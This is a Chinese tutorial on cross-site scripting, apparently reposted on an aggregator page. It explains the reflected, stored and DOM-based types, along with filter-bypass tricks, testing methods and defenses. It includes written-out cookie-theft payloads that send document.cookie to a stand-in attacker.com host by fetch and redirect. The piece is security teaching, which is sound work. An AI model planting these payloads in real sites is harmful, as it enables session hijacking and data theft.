当前位置: 首页 > news >正文

xss知识点

XSS 常见类型及核心知识点
XSS(跨站脚本攻击)是Web安全中最常见的漏洞之一,核心原理是用户输入未被有效过滤/转义,直接被当作HTML/JS代码渲染到页面,导致浏览器执行恶意脚本,可实现窃取Cookie、劫持会话、篡改页面、钓鱼攻击等危害。以下是其常见类型及核心知识点梳理。

一、XSS 三大核心类型

  1. 反射型XSS(非持久型)
    反射型XSS是最基础的类型,恶意代码通过URL参数、表单输入等方式传入,服务器未做处理直接“反射”回页面执行,仅当前点击恶意链接的用户触发,不存储到服务器。
  • 触发场景:搜索框、URL传参页面、登录跳转页、反馈表单等。
  • 典型示例:http://test.com/search?keyword=<script>alert('XSS')</script>,服务器直接将参数值渲染到页面,浏览器解析执行脚本。
  • 特点:触发依赖用户点击恶意链接,传播范围有限,但易构造、利用门槛低,是CTF和渗透测试中高频考点。
  1. 存储型XSS(持久型)
    存储型XSS危害最大,恶意代码提交后被服务器存储(数据库、文件、缓存等),所有访问该页面的用户都会触发,无需主动点击恶意链接。
  • 触发场景:评论区、留言板、用户昵称/简介、文章发布、后台日志等。
  • 典型示例:在博客评论区提交<script>fetch('http://attacker.com/steal?c='+document.cookie)</script>,代码存入数据库,后续所有浏览该文章的用户都会执行脚本,Cookie被窃取。
  • 特点:持久化存储、批量触发、隐蔽性强,是企业Web应用的高危漏洞,需重点防范。
  1. DOM型XSS
    DOM型XSS属于客户端漏洞,恶意代码不经过服务器处理,直接通过前端JS修改DOM结构触发,漏洞根源在前端代码逻辑。
  • 触发场景:前端通过location.hashdocument.URLinnerHTMLdocument.write等直接渲染用户输入,未做过滤。
  • 典型示例:页面JS代码document.getElementById('content').innerHTML = location.hash.substr(1),访问http://test.com<img src=x onerror=alert(1)>,前端直接解析哈希值中的恶意代码,无需服务器参与。
  • 特点:漏洞仅存在于客户端,服务器日志难以记录,绕过难度较低,常与前端框架漏洞结合利用。

二、XSS 核心知识点

  1. 攻击Payload 核心技巧
    XSS利用的关键是构造可绕过过滤的Payload,常见技巧包括:
  • 基础弹窗验证:<script>alert(1)</script><img src=x onerror=alert(1)><svg onload=alert(1)>(无脚本标签绕过)。
  • 敏感数据窃取:<script>location.href='http://attacker.com/steal?cookie='+document.cookie</script>(窃取Cookie)、<script>fetch('http://attacker.com',{method:'POST',body:document.cookie})</script>(外带数据)。
  • 过滤绕过:大小写混淆(<ScRiPt>)、HTML实体编码(&x3C;script&x3E;)、拼接绕过(eval("ale"+"rt(1)"))、事件属性绕过(onmouseoveronclick)。
  1. 漏洞挖掘思路
  • 手动测试:在所有用户可控输入点(输入框、URL参数、Cookie、请求头)插入基础Payload,观察页面是否执行;重点测试DOM操作、富文本编辑器、URL哈希值。
  • 工具辅助:使用Burp Suite的XSS扫描模块、XSS Hunter盲打平台,自动化检测并验证漏洞;结合浏览器控制台,查看DOM渲染是否存在恶意代码。
  • 代码审计:后端重点检查echoprint等输出函数是否做转义,前端重点排查innerHTMLdocument.write等危险操作,确认输入是否经过过滤。
  1. 防御核心措施
  • 输入过滤:对用户输入做白名单校验,仅允许合法字符,过滤<script>on事件、javascript:伪协议等危险内容。
  • 输出转义:渲染到页面前,对<>"'&等特殊字符做HTML实体转义,避免浏览器解析为代码。
  • CSP(内容安全策略):通过HTTP头Content-Security-Policy限制资源加载,禁止内联脚本、指定可信脚本源,从源头阻断XSS执行。
  • HttpOnly Cookie:设置Cookie的HttpOnly属性,禁止JS读取Cookie,缓解Cookie窃取风险。
  • 安全编码:前端优先使用textContent替代innerHTML,后端使用框架自带的转义函数(如PHP的htmlspecialchars),避免手动处理过滤逻辑。
  1. 漏洞危害与延伸
    XSS不仅可窃取会话,还能结合CSRF实现账户劫持、篡改页面内容实施钓鱼、利用浏览器漏洞提升权限,甚至联动其他漏洞(如文件上传、SQL注入)形成组合攻击。在CTF中,XSS常结合盲打、绕过过滤、CSP绕过等考点,是Web方向的核心考察内容。

综上,XSS的核心是“输入输出处理不当”,掌握其类型、Payload构造、挖掘与防御方法,既能应对渗透测试实战,也能高效解决CTF相关题目,是Web安全学习的基础必备知识点。

http://www.jsqmd.com/news/345085/

相关文章:

  • 建站投资如何规避运营风险?2026年充电桩厂家推荐与多维度评价解析 - 品牌推荐
  • 建站厂家技术路线如何选?2026年充电桩建站推荐与评价,解决长期运营与扩展痛点 - 品牌推荐
  • 2026年充电桩建站厂家推荐:社区与商业场景深度评测,解决运营复杂与安全痛点排名 - 品牌推荐
  • 2026年北京婚礼策划公司推荐:基于多场景实测评价,涵盖户外室内与异地备婚痛点 - 品牌推荐
  • 2026年热门的接线端子三进三出/双排接线端子厂家推荐参考 - 行业平台推荐
  • 扬州市英语雅思培训机构推荐,2026权威测评出国雅思辅导机构口碑榜单 - 老周说教育
  • 2026年质量好的精磨棒光轴/镀铬光轴厂家采购参考指南 - 行业平台推荐
  • 西门子PLC伺服大型20轴程序modbus通讯RS232通讯MES通讯气缸,通讯,机械手,模拟量等
  • 社区建站该选哪家厂家?2026年充电桩建站厂家推荐排名,直击安装与管理核心痛点 - 品牌推荐
  • Java基于Spring Boot+Vue的校园防诈骗宣传网站
  • 2026年充电桩建站厂家推荐:长期运营稳定性排名,针对高效管理与安全痛点指南 - 品牌推荐
  • 2026年贵州、新疆矿用隔爆干式变压器实力厂家推荐,哪家服务更靠谱 - 工业品网
  • 2026年靠谱的消防泵专业制造商十大排名揭晓 - 工业品网
  • 2026年充电桩建站厂家推荐:基于产能与交付效率评价,解决规划与兼容性痛点 - 品牌推荐
  • 扬州市英语雅思培训机构推荐、2026权威测评出国雅思辅导机构口碑榜单 - 老周说教育
  • 2026年重庆口碑好的冷机来样定制公司推荐,专业小型冷机生产企业全解析 - 工业推荐榜
  • Java基于Spring Boot+Vue的户外爱好者网站的设计与实现
  • 智能冷机生产公司年度排名,谁是用户心中的优质之选 - myqiye
  • UN R156与GB 44496-2024全面对比解读
  • 讲讲广州质量好的洗发水供应商,洗发水选购攻略 - 工业设备
  • 2026年西南地区冷机推荐厂商排名,选购冷机这些品牌值得关注 - 工业品牌热点
  • 扬州市英语雅思培训机构推荐;2026权威测评出国雅思辅导机构口碑榜单 - 老周说教育
  • 2026疲劳试验机哪家好?全维度品牌实力测评与行业推荐 - 品牌推荐大师1
  • JMeter脚本语言详解:BeanShell和Groovy使用指南
  • 哪个厂家适配老旧小区改造?2026年充电桩建站厂家推荐与评价,解决负荷冲击与安装复杂核心痛点 - 品牌推荐
  • 2026年物流托盘厂家权威推荐:木制/免熏蒸/仓储/出口/周转托盘源头厂家精选 - 品牌推荐官
  • 探讨云南电动EMB冷机商渠道,怎么选择合适的渠道 - 工业推荐榜
  • 西门子200smart PLC脉冲除尘器程序大揭秘
  • 扬州市英语雅思培训机构推荐:2026权威测评出国雅思辅导机构口碑榜单 - 老周说教育
  • 实战Moltbot(Clawdbot)教程--使用QQ、钉钉和飞书